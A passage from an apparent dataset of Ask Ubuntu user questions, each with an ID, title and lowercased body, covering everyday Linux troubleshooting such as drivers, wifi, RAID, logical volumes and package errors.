packages have unmet dependencies : pidgin : depends : pidgin-data ( < 1:2.7.11-z ) but 1:2.10.3-0ubuntu1.5 is to be installed depends : perlapi-5.10.1 but it is not installable pidgin-libnotify : depends : libindicate-gtk2 ( > = 0.2.2 ) but it is not installable depends : libnotify1 ( > = 0.5.0 ) but it is not installable depends : libnotify1-gtk2.10 but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
519139	avr eclipse plugin not showing at eclipse ubuntu 14.04 64 bit	i was using avr eclipse plugin in my ubuntu 12.04 with eclipse-cdt , now i upgraded to 14.04 and avr-eclipse plugin does not shows up after installation . i found in 14.04 eclipse was not installed in /opt as 12.04 how can i get avr-eclipse plugin work with ubuntu 14.04 i am using 64 bit machine
519143	problem installing windows 7 on laptop with ubuntu already installed	i 've met a problem when tried to install windows 7 on laptop where ubuntu 14.04 lts already installed . in ubuntu using gparted : i created separate ntfs partition on ssd ( ubuntu is installed on another partition on this ssd ) ; booted from windows 7 usb drive ; started installation process : windows file loaded successfully ; i passed to the step where i should select the partition for windows 7 : setup was unable to create a new system partition or allocate an existing system partition . screenshot so i get the same massage when try to install windows on separate partition . i tried to delete partition and use unallocated space instead : the same result . windows ca n't create a new partition with the same error message . i do n't want to format the whole ssd and install windows 7 and ubuntu after it . is there any way to install windows 7 on the same ssd where ubuntu is already installed ? ( using separate partition for windows ) .
519144	ubuntu server not reading /etc/network/interfaces	so after getting frustrated searching online and only ever coming up with posts about how to change em1 to eth0 , i have come here to ask this question : what would cause ubuntu server to not load settings as defined in /etc/network/interfaces ? i had issues even getting server to install with an active connection . i unplugged my cable , did an offline installation , and now , even with all the correct parameters set in /etc/network/interfaces , it does n't load the settings . doing an ifconfig -a just shows em1 as being unprogrammed . i can set the parameters using ifconfig add ... etc ... but for whatever reason em1 is not loading what i have in the config file . assistance would be appreciated , i would prefer not to try to re-install again as it took using lts version 12 , 13 , and 14 multiple times before i tried doing an offline install to get it to work . that is another issue unto it 's own most likely due to the only internet access being off my windows box using ics . all i am asking for now , is why would em1 ignore the config file , or just fail to load it ? thanks , skitt
519145	copy recursively from remote server to hdfs loaction	my requirement is to copy directory structure from remote server ( which is sftp server ) to hadoop location.i have tried few options given in the net but nothing seems to work .
519148	publishing free proprietary app without english ui in software center	my app has ui only in local language , non-english . could it still be published in software center ? and if so , do i need a description in english ?
519152	how to enable numlock at login screen on ubuntu 14.04 lts ( when you type password )	just that question . how to keep it on ? my pwd has numbers and it is weird to not type them on the numpad for me ( tried and retried numlockx properly on many ways found on the net , no success ) p.s . on the bios everything is as it should ( i have pwd on win 7 and numlock is on automatically ) .
519154	how to solve the error : warning : root : could not open file '/etc/apt/sources.list '	wazir @ wazir : ~ $ sudo software-properties-gtk [ sudo ] password for wazir : ( process:15506 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . can not set locale : unsupported locale setting warning : root : could not open file '/etc/apt/sources.list' warning : root : could not open file '/etc/apt/sources.list' traceback ( most recent call last ) : file `` /usr/bin/software-properties-gtk '' , line 104 , in < module > app = softwarepropertiesgtk ( datadir=options.data_dir , options=options , file=file ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 89 , in __init__ softwareproperties.__init__ ( self , options=options , datadir=datadir ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 97 , in __init__ self.reload_sourceslist ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 585 , in reload_sourceslist self.distro.get_sources ( self.sourceslist ) file `` /usr/lib/python2.7/dist-packages/aptsources/distro.py '' , line 87 , in get_sources raise nodistrotemplateexception ( `` error : could not find a `` aptsources.distro.nodistrotemplateexception : error : could not find a distribution template
519155	audio duration in dolphin	dolphin 4.13.3 under kubuntu 14.04.1 lts fails to show any details under the `` duration '' column of the `` details '' view mode for an audio mp3 file , which can be played by the system . additionally , no metadata/tags are shown under `` properties '' for the file . iirc , these details were previously included on the `` properties '' page . how do i enable these features ? ps : this is a standard installation , so nepomuk/strigi/baloo/whatever should all be at their default settings .
519158	how to auto save tabs in terminator	i 'm working constantly with terminator with multiple tabs ( splitted vertically and horizontally ) , almost every time i reboot my machine i open terminator and start opening tabs , and configure each tab to be in a specific folder and export few environment variables ( different for each tab ) . is there any way to automate this procedure ? means : open 4 tabs in terminator cd each tab to point to a different directory export few environment variables in each tab
519159	ffmpeg , error hardcoding subtitles	i 'm trying to use ffmpeg to hardcode subtitles , but it gives this error : no such filter : 'subtitles' error opening filters ! my ffmpeg command and complete console output : $ ffmpeg -i 24.903.hdtv-lol.mp4 -vf subtitles=24.903.hdtv-lol_ar.srt out.avi ffmpeg version 1.2.6-7:1.2.6-1~trusty1 copyright ( c ) 2000-2014 the ffmpeg developers built on aug 5 2014 18:47:03 with gcc 4.8 ( ubuntu 4.8.2-19ubuntu1 ) configuration : -- arch=amd64 -- disable-stripping -- enable-avresample -- enable-pthreads -- enable-runtime-cpudetect -- extra-version='7:1.2.6-1~trusty1 ' -- libdir=/usr/lib/x86_64-linux-gnu -- prefix=/usr -- enable-bzlib -- enable-libdc1394 -- enable-libfreetype -- enable-frei0r -- enable-gnutls -- enable-libgsm -- enable-libmp3lame -- enable-librtmp -- enable-libopencv -- enable-libopenjpeg -- enable-libopus -- enable-libpulse -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-vaapi -- enable-vdpau -- enable-libvorbis -- enable-libvpx -- enable-zlib -- enable-gpl -- enable-postproc -- enable-libcdio -- enable-x11grab -- enable-libx264 -- shlibdir=/usr/lib/x86_64-linux-gnu -- enable-shared -- disable-static avcodec configuration : -- arch=amd64 -- disable-stripping -- enable-avresample -- enable-pthreads -- enable-runtime-cpudetect -- extra-version='7:1.2.6-1~trusty1 ' -- libdir=/usr/lib/x86_64-linux-gnu -- prefix=/usr -- enable-bzlib -- enable-libdc1394 -- enable-libfreetype -- enable-frei0r -- enable-gnutls -- enable-libgsm -- enable-libmp3lame -- enable-librtmp -- enable-libopencv -- enable-libopenjpeg -- enable-libopus -- enable-libpulse -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-vaapi -- enable-vdpau -- enable-libvorbis -- enable-libvpx -- enable-zlib -- enable-gpl -- enable-postproc -- enable-libcdio -- enable-x11grab -- enable-libx264 -- shlibdir=/usr/lib/x86_64-linux-gnu -- enable-shared -- disable-static -- enable-version3 -- enable-libopencore-amrnb -- enable-libopencore-amrwb -- enable-libvo-aacenc -- enable-libvo-amrwbenc libavutil 52 . 18.100 / 52 . 18.100 libavcodec 54 . 92.100 / 54 . 92.100 libavformat 54 . 63.104 / 54 . 63.104 libavdevice 53 . 5.103 / 53 . 5.103 libavfilter 3 . 42.103 / 3 . 42.103 libswscale 2 . 2.100 / 2 . 2.100 libswresample 0 . 17.102 / 0 . 17.102 libpostproc 52 . 2.100 / 52 . 2.100 input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from '24.903.hdtv-lol.mp4 ' : metadata : major_brand : isom minor_version : 1 compatible_brands : isomavc1 creation_time : 2014-05-13 02:11:18 duration : 00:41:48.80 , start : 0.000000 , bitrate : 977 kb/s stream # 0:0 ( und ) : video : h264 ( high ) ( avc1 / 0x31637661 ) , yuv420p , 720x404 [ sar 1:1 dar 180:101 ] , 850 kb/s , 23.98 fps , 23.98 tbr , 24k tbn , 47.95 tbc metadata : creation_time : 2014-05-13 02:11:18 stream # 0:1 ( und ) : audio : aac ( mp4a / 0x6134706d ) , 48000 hz , stereo , fltp , 123 kb/s metadata : creation_time : 2014-05-13 02:11:21 handler_name : gpac iso audio handler file 'out.avi ' already exists . overwrite ? [ y/n ] y no such filter : 'subtitles' error opening filters ! i 'm trying to follow this tutorial
519161	is there a ppa for gvim > 7.4.338 ?	the breakindent feature is the greatest thing ever , but it 's in 7.4.338 . the latest version in the ubuntu repos is just 7.4 , i think . i notice arch has a package for it , but i ca n't seem to find one for ubuntu yet . i 'm hopeless with compiling things , otherwise i 'd compile it myself .
519165	how to get rid of icons on unity 's top right bar	i was wondering how to remove applications from unity 's top right bar in ubuntu 14.04. i have tried looking in .local and have looked in settings but found nothing . i have seen a few posts on this before but none have been for 14.04 and more importantly , none have worked .
519166	problems with nvidia drivers 173 with ubuntu 12.04	i tried to install ubuntu 14.04.01 , but i ran into serious problems ( details here ) i have installed 12.04.05 instead , but i still have serious problems . after installing i reboot , the system starts ok , a window opens up about upgrade to 14.04 , i decline and the window closes . i can see the bar at the top of the screen , but launcher is missing and now the ui is frozen : i ca n't click anything , right-click wo n't open the menu . when i press ctrl-alt-f1 there is a error message at the tty : could not write bytes : broken pipe - [ 929.157700 ] nouveau e [ drm ] gpu lockup - swithing to software fbcon if i idle on the tty these messages appear : [ 1070.992016 ] nouveau e [ xorg [ 1083 ] failed to idle channel 0xcccc0000 [ xorg [ 1083 ] ] there are several of them , the numbers change , but the text and the channel stays the same . if i idle long enough the desktop is swithced on and i have to log in and the top bar is missing . my computer : intel d865perl , pentium 4 cpu ( 3 ghz ) , 3 gb ram , and nvidia quadro fx 500/600 graphics card . i have a harddrive with two partitions : one for the xp and one for ubuntu and it 's partitions . i think the problem is with the drivers , so i press ctrl-alt-f1 and install the drivers using these instructions via tty : sudo add-apt-repository ppa : xorg-edgers/ppa -y sudo apt-get update sudo apt-get install nvidia-173 then i type lspci -vnn | grep -i vga -a 12 and everything seems ok except that kernel driver in use : nouveau the next line is kernel modules : nvidia_173 , nouveau , nvidiafb after reboot i get this after this `` ok '' - > `` reconfigure graphics '' - > `` use default ( generic ) configuration '' or `` use your backed-up configuration '' - > nothing happens if i choose `` use low-graphics mode just for this session '' the system freezes . how could i solve this ? i seems clear that the problem lies with the nvidia driver . would it help if i changed the kernel driver from nouveau to nvidia_173 ? how can i do that ? i can find advice on how to do it in unity with dash , but how can i do it in tty ? solution : using the latest drivers helped . i should have installed the 304 version in the first place instead of the 173 version i used ( that was the version i used in my xp )
519168	run program inside gdb ?	how do i run amule inside gdb to report a bug ? i 'm having trouble with this since i just started with lubuntu . thanks .
519170	how do i find which os layer ( iptables , rp_filter , etc ) is dropping a packet ?	let 's say that i 'm running a ping towards a machine and i see from tcpdump that the icmp echo reply is being received at the ethernet port but the ping program is not getting it . so i know that ubuntu is dropping the packet but is there any good way to find which os layers is doing it , to my knowledge it can be : iptables rp_filter vlan not matching , etc so it 's there a way to `` inject '' or `` pretend '' or `` emulate '' a packet that tells me who drops it ? i mean something akin to ip route get xxx from xxx iff xxx in the sense that that one tells me that the ip routing table would do for an outgoing packet and i want something that tells me what the kernel will do with a incoming packet . is there something like that ? if not , what is a good procedure to find out who drops the packet ?
519172	after upgrade to latest dropbox , it stopped syncing	i run ubuntu 12.04 lts few days ago dropbox started notifying that i have old version installed and that i should upgrade . i did that , first uninstalled old one , than installed latest dropbox by adding dropbox.com repository : http : //linux.dropbox.com/ubuntu precise main it went well , and newest version is installed . now i still get nottifications that i run old version ! bigger problem is : dropbox icon shows that it is trying to sync things all the time , and changes that i made on my machine are not synced to cloud at all !
519173	wifi is disabled by hard switch hp 430	i searched and tried many things to resolve this issue but nothing helped me . please find the methods below that i tried . os : ubuntu 14.04 laptop : hp 430 ( 64 bit ) checked the radio transmitter kernel subsystem rfkill list all output : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : yes hard blocked : yes 2 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : yes 3 : phy0 : wireless lan soft blocked : no hard blocked : yes based on the above output , it is a hardware lock . so , checked/changed the bios configuration settings for hot keys or fn+f1 ..f12 by referring this link . but no help . i suspected drivers . so , i cross checked the drivers and followed the procedure which is mentioned in this link - sadly no help i decided to disable the hot keys function itself and i followed this thread for that . again no help . if you are not able to give solution for the hard lock issue . i am fine with enabling the wifi in startup also edited : added more information about system drivers , etc input : $ lspci -nnk | grep -ia2 net output : $ 01:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : hewlett-packard company device [ 103c:3672 ] kernel driver in use : r8169 -- 02:00.0 network controller [ 0280 ] : qualcomm atheros ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:1461 ] kernel driver in use : ath9k input : $ iwconfig output : $ eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry short limit:7 rts thr : off fragment thr : off power management : off input : $ lsmod output : $ module size used by talpa_vfshook 35673 1 talpa_pedconnector 12509 0 talpa_pedevice 13516 2 talpa_pedconnector talpa_vcdevice 13082 10 talpa_core 91941 3 talpa_vfshook , talpa_vcdevice talpa_linux 34428 4 talpa_vfshook , talpa_vcdevice , talpa_core talpa_syscallhook 20264 1 talpa_vfshook rfcomm 69160 8 bnep 19624 2 arc4 12608 2 ath9k 92258 0 ath9k_common 25637 1 ath9k ath9k_hw 424791 2 ath9k_common , ath9k ath 29006 3 ath9k_common , ath9k , ath9k_hw parport_pc 32701 0 ppdev 17671 0 bcma 52096 0 mac80211 560377 1 ath9k snd_hda_codec_hdmi 46368 1 snd_hda_codec_realtek 65580 1 cfg80211 505934 4 ath , ath9k_common , ath9k , mac80211 hp_wmi 14062 0 sparse_keymap 13948 1 hp_wmi compat 13849 4 cfg80211 , ath9k_common , ath9k , mac80211 ssb 62379 0 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 143060 0 snd_hda_intel 56451 3 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec kvm 451511 1 kvm_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel ghash_clmulni_intel 13216 0 cryptd 20359 1 ghash_clmulni_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel wmi 19177 1 hp_wmi joydev 17381 0 snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi i915 783805 3 drm_kms_helper 53081 1 i915 snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi video 19476 1 i915 snd_timer 29482 2 snd_pcm , snd_seq drm 303102 4 i915 , drm_kms_helper hp_wireless 12637 0 snd 69322 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi btusb 32412 0 serio_raw 13462 0 bluetooth 391136 22 bnep , btusb , rfcomm mac_hid 13205 0 lpc_ich 21080 0 mei_me 18627 0 mei 82276 1 mei_me soundcore 12680 1 snd rtsx_pci_ms 18151 0 i2c_algo_bit 13413 1 i915 memstick 16966 1 rtsx_pci_ms lp 17759 0 parport 42348 3 lp , ppdev , parport_pc rtsx_pci_sdmmc 23274 0 ahci 25819 2 libahci 32716 1 ahci psmouse 106678 0 r8169 67581 0 rtsx_pci 45956 2 rtsx_pci_ms , rtsx_pci_sdmmc mii 13934 1 r8169
519175	what is the ubuntu os loader and where does it reside ?	i am studying for a class on system and network engineering and in one material we are told that ubuntu uses the os loader to load the bootloader grub . my question is what is the ubuntu os loader and where does it reside ?
519176	kubuntu root password	i 've been running kubuntu for about a month now , still learning . all of a sudden as of about two days ago , if i try to install or update software using muon , it asks for the root password . i 'm assuming this is my administrative password , but that password wo n't work . i know i 'm typing it in correctly ( case sensitive ) and i have n't forgotten my admin password because i can log in to my laptop when i first turn it on using the same password . if the administrative password is not the root password , then what is the root password ? i followed some directions online regarding booting in safe mode , but i ca n't get the passwd command to work . i tried that twice and i keep getting an error message telling the password was not changed . then i do n't know how to exit out of safe mode . i kept hitting the escape key and that did n't work . i ended up just powering off my laptop to get out of safe mode .
519181	bluetooth doesnot show near by devices	i was using windows till yesterday.i intalled ubuntu 14.04 today . the bluetooth is on.visiblity is on.but when i select setup a new device . no device shows up .
519183	i ca n't upgrade ubuntu 12.04 to 14.04 because of a dropbox upgrading problem	i tried to upgrade dropbox after having received a pop-up message in desktop from dropbox asking me to do it . i followed the instructions on the dropbox official downloading page . dropbox can now only be accessed trought the command ~/.dropbox-dist/dropboxd and it seems that my cpu is overused . when i restart my computer , dropbox still asks me to upgrade . i tried again but i had the same results again and adain i currently use ubuntu 12.04 ( 64 bits ) . i tried to upgrade to 14.04 , but the upgrading process is eventually blocked on downloading dropbox and nothing happens
519189	how can i get jshint to work ?	i installed jshint using sudo npm install -g jshint , and it seems to have worked : $ which jshint /usr/local/bin/jshint yet running jshint or its full path equivalent does n't seem to do anything . it does n't give an error , either -- it just does nothing : $ jshint $ jshint -- help $ jshint -- verbose $ jshint -- debug $ jshint admin.js $ jshint admin.js -- verbose $ /usr/local/bin/jshint admin.js i also tried symlinking nodejs per this answer : $ sudo ln -s /usr/bin/nodejs /usr/bin/node $ jshint admin.js -- verbose $ jshint admin.js $ jshint -- help $ man jshint no manual entry for jshint see 'man 7 undocumented ' for help when manual pages are not available . what am i missing here ?
519190	ubuntu 14.04.1 ( amd64 ver ) and rca 42 '' tv	i 'm not new to computers and have attempted linux before ( many years ago ) but am now trying to hook up a computer to my tv ( for xbmc / kodi use ) via hdmi cable . i have installed 14.04.1 , but it installed for an rca 46 '' tv ... the left side icons are half off the screen and the top bar is completely off the screen . i have no idea how or where to change the settings and i 'm new to this , but if you give me step-by-step directions , i can follow them . thank you and have a great day : ) rapier system specs : asus m3n-ht deluxe motherboard amd athlon 64 x @ 5000+ cpu 2gb ram nvidia nforce 980a gpu
519191	working sql client	i managed to get working apache and everything 's fine . got mysql running , which is nice . but then it turned out that i had to use terminal for all the sql commands i had to put inside . i 'm not close to that good to manage database by commands . so i wanted to use phpmyadmin , which prompted thousands errors and i ca n't even look into a table i just set up . does somebody know ubuntu friendly mysql database manager ?
519193	create a raid5 on my ubuntu server 12.04	i have an operational ubuntu server 12.04 with only one hd ( 1tb ) . i need more capacity and stability , so i bought last week 3 hd ( 1tb each ) to make a raid5 and migrate the information of the old hd to the new raid system . i created the raid5 on the three hd using mdadm tool and apparently works fine . i created 2 partitions on the raid5 , one for the system that i need to copy and other one to swap . then i boot the server using system rescue cd utility to move all the system files from the old hd to the new raid partition . when i finished i tried to disconnect the old hd and boot system from the raid , but it shows an error `` reboot and select proper boot device '' . using systemrescue cd and fdisk command i set the boot partition to `` md0p1 '' who is the partition in the raid that content the os . same error when i try to boot normally . any one know what is my mistake ? thanks . edit ( info about raid ) : this is the output of the command `` mdadm -- detail /dev/md0 '' version : 1.2 creation time : tue sep 2 07:26:56 2014 raid level : raid5 array size : 1953260544 ( 1862.77 gib 2000.14 gb ) used dev size : 976630272 ( 931.39 gib 1000.07 gb ) raid devices : 3 total devices : 3 persistence : superblock is persistent update time : wed sep 3 06:25:12 2014 state : clean active devices : 3 working devices : 3 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 512k name : server.angel.es:0 uuid : 542767a6:3241db3d:5c4b3a80 : e9c0593a events : 346 number major minor raiddevice state 0 8 17 0 active sync /dev/sdb1 1 8 1 1 active sync /dev/sda1 3 8 33 2 active sync /dev/sdc1
519195	logical volume resizing issues after migrating to ssd	i have recently been upgrading a machine that i built out of recycled/reclaimed/reused parts and have managed to lay my hands on an ssd . as it would provide a major speed boost over the ancient ide drive that i was using for my root disk , i installed it and used clonezilla to transfer my existing os over to the new drive . i know that many of you reading this will be wondering why i did n't do a completely clean install , but this is a box that i use for experimentation and it would take a very long time to reconfigure a fresh install in the way that i want . the original drive was 80gb and the new drive is 120gb , so i started making adjustments to the partition sizes ; i increased the boot partition slightly and increased the extended partition hosting the logical volume so that it took up the remaining space . when i checked in gparted , although the size of ubuntu-vg had increased to 111gb , it was saying only 74gb was being used ( the size of the original partition on the 80gb ide drive ) . i do n't know the terminal commands for volume group management , so i used the lvm gui tool to increase the size of the volume ( gparted is now reporting that the whole partition is used ) . there is a swap partition contained within ubuntu-vg , so increasing the root partition to use the remaining free space has sandwiched the swap file like this : http : //i.imgur.com/fsaegxm.png according to the information provided by gparted and the lvm gui , i should have successfully extended my root partition to use all of the free space on the drive ... only other applications do n't agree . i have a conky system monitor on my desktop that displays space on all of my drives , which is currently displaying the same stats as it did for my 80gb root drive . additionally , right clicking on `` computer '' in the nautilus side bar and selecting `` properties '' then reports the same stats as conky , so something clearly is n't right here . any advice will be appreciated , as i am a bit stumped by all of this . also , please give advice in a step by step format , as this is the first time i 've had to edit logical volumes and i 'm not even sure how to gather the right information through the terminal ... so , be gentle ; ) thanks in advance !
519198	docking floating text options window in gimp 2.8.10 ?	regarding on-canvas text editing in the gimp : is there any way to dock , move , or eliminate the floating text options window ? i use the text tool for captioning and labeling , and it gets in the way . thanks for any help .
519200	how to install wireless drivers for my laptop	i 'm having problem installing wireless driver in my compaq cq 43 . pci id is bcm4313 and i 'm using ubuntu 14.04 lte 64 bit operating system . please somesone help me . i 'm a newby so i 'm kinda new in linux system . thanks in advance , engg . saif
519206	global keybind to a script	so i have a delicate problem that is about to completely drive me insane . to make a long story short , i run linux mint 17 on a server that i use for just about everything , acrhive , nas , media player ( xbmc ) etc . it 's sitting next to my tv and is connected through hdmi from the intel gpu . the server is a haswell core i5 with 16 gb ram . i have created a user 'xbmc ' that auto-logins to xbmc so that in order to watch movies etc i just turn on the tv and select input hdmi 1 . everything is working just fine except for the fact that if the cinnamon engine starts or re-starts or in any way initialize when the tv is turned of , the hdmi wo n't connect unless i manually `` service mdm restart '' . so i have made a simple script that just restarts the cinnamon engine and i would like to invoke that in th easiest way possible , preferrably a keypress on the wireless keyboard . the ctrl-alt-backspace only works when you 're logged in to x-windows , not at the login prompt or when logged in to xbmc which is the normal status when not using the computer . so in essence a [ u ] [ b ] global [ /b ] [ /u ] keybind that launches my script `` restartcinnamon.sh '' . is this possible with a resonable amount of effort ?
519208	installing ubuntu on a ssd and hdd system	so i have this 128 gb ssd and a 1 tb hdd . and i plan to install ubuntu on this system that uses them . now all the info that i have found in here about similar problems , are usually with limited ssd space , but mine is pretty big . it is a samsung 840 pro 128 gb . so my question is , what would be the intelligent way of partitioning my system in this case ? obviously the / will go on ssd . then /home and /swap will go on hdd . but what else ? should i care about `` /tmp '' and `` /var '' also and move them on my hdd ? how much size would it be smart to allocate for them then ?
519211	.desktop file does n't execute a script , works fine when run by hand	i am having problems with my .desktop files . i have a shell script that constantly watches for a file to be put into the `` downloads '' folder . when a file is put into the folder it automatically executes a c program that i wrote in the terminal , and offers me different options for where i would like to move the file . all is well there . however , i want a desktop shortcut to the program . i tried using the shortcut editor to specify the command to run , and to excecute it in terminal , and to keep terminal running after the execution of the command . all that is in the command is cd ~/documents/prog/c/learn/inotify-tools & & ./notifyscript.sh however , that wo n't work . also , i tried writing a c program that basically told the system the above command , thinking that the shortcut editor was messing up . interestingly , it runs fine when i am in its directory and type ./'download manager ' however , i do n't want to keep changing to the directory on every reboot and run the program . instead , i want a .desktop shortcut or , even better , a way to start on reboot automatically . i do n't understand why it is n't working . if i do n't execute in terminal it does n't work ... here is the desktop file : [ desktop entry ] name=download manager comment= exec=cd ~/documents/prog/c/learn/inotify-tools & & ./notifyscript.sh icon=icon name terminal=true type=application startupnotify=true x-keepterminal=true here is the c source code and its desktop file as well , just as another option : [ desktop entry ] name=download manager comment= exec=./'download manager' icon=icon name terminal=true type=application startupnotify=true x-keepterminal=true c source code : /* desktoplauncher.c source code written by me this program is used to launch the inotify monitor shell script which in turn launches the download manager program whenever a file is placed in the '' downloads '' folder . */ # include < stdio.h > int main ( ) { system ( `` cd ~/documents/prog/c/learn/inotify-tools & & ./notifyscript.sh '' ) ; }
519215	ldap mounting home over network	guys i am working with ldap and was successful in making the user logging in using pam but how can i sync the directories so that if the user logs in and saves any data in his home folder can access all his data by logging in anywhere in the network . ultimately i want that the ldap user can access his home data anywhere in the network .
519216	is there a way to have the login password different from the su password ?	i have a friend that 's running debian and his computer login password is different from the superuser password . i was wondering if there 's a way to do this in ubuntu ?
519219	playing .vob files on linux	having trouble playing dvds on my laptop . they are .vob files . neither vlc , mplayer nor smplayer seem to help . anything else i could do ?
519222	steps for testing multitouch and registering devices with various applications	i want to start with my specific issue because i hope to fix my problem . then i want to end a less specific question because i think it will be helpful to the community here we go : i am having trouble getting the new virtualbox to recognize my touchscreen in ubuntu 14.04 desktop 64bit edition . that 's my narrowly defined problem . in researching how to solve it , i found that it shows up in some places such as `` xinput '' and not in others such as `` lsinput '' . i have found that it works in some programs such as `` chromium '' where i can pinch and zoom and swipe instead of using back and forward buttons ; and that it does n't work in other places `` virtual box '' is a good example and im using the latest version and i have `` usb multitouch '' checked . because it does n't show up in lsinput i was unable to test it in mtdev-tools which was part of the troubleshooting process my research turned up ; so the more generic question which might be helpful to the community is `` what are the ( current/best ) steps for testing multi-touch devices and being sure they are showing up in all the right places so that they are available to everything that could potentially use them '' hopefully that is n't too broad but the readily available information seems unhelpful , and outdated .
519224	how can i tell how fast the cpus are running on a power8 server ?	i 'm running with ubuntu 14.04 on a power8 server . is there a way to tell how fast the processors are running ? how do i enable the tools that come with powerpc-utils and cpufreq ? added ... . ppc64_cpu reports # ppc64_cpu -- frequency min : 3.693 ghz ( cpu 159 ) max : 3.693 ghz ( cpu 1 ) avg : 3.693 ghz the output of 'cpufreq-info ' shows ( example for one core ) : analyzing cpu 159 : driver : powernv-cpufreq cpus which run at the same hardware frequency : 152 153 154 155 156 157 158 159 cpus which need to have their frequency coordinated by software : 152 153 154 155 156 157 158 159 maximum transition latency : 4294.55 ms. hardware limits : 2.06 ghz - 3.69 ghz available frequency steps : 3.69 ghz < clipped > , 2.09 ghz , 2.06 ghz available cpufreq governors : conservative , userspace , powersave , ondemand , performance current policy : frequency should be within 2.06 ghz and 3.69 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 2.06 ghz ( asserted by call to hardware ) . cpufreq stats : 3.69 ghz:0.66 % , 3.66 ghz:0.00 % , 3.62 ghz:0.00 % < clipped > 2.09 ghz:0.00 % , 2.06 ghz:99.34 % ( 5 ) here we can see the cpu is still clocked at ~2ghz and the governor is `` ondemand '' so nothing has changed . this ubuntu installation is fully up to date
519225	reinstalling x11 drivers in ubuntu 14.04	i 've recently upgraded from ubuntu 12.04 to 14.04 . now , i am unable to launch xserver . the following error is shown : ( ee ) module abi major version ( 6 ) does n't match the server 's version ( 8 ) xinit : connection to x server lost waiting for x server to shut down ( ee ) server terminated successfully ( 0 ) . closing log file . i 'm suspecting that it 's related to the x11 drivers . reinstalling and reconfiguring xserver do not work . is there a chance that my /etc/apt/sources.list and /etc/apt/sources.list.d/* got altered ? how may i rebuild the x11 drivers ? currently i have no nvidia drivers installed . my sources.list file has the contents : sources.list # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / precise main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty main restricted # added by software-properties # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu trusty main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu trusty-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu trusty universe deb http : //archive.ubuntu.com/ubuntu trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu trusty multiverse deb http : //archive.ubuntu.com/ubuntu trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu trusty-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-backports main restricted universe multiverse # added by software-properties deb http : //archive.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-security restricted main multiverse universe # added by software-properties deb http : //archive.ubuntu.com/ubuntu trusty-security universe deb http : //archive.ubuntu.com/ubuntu trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main
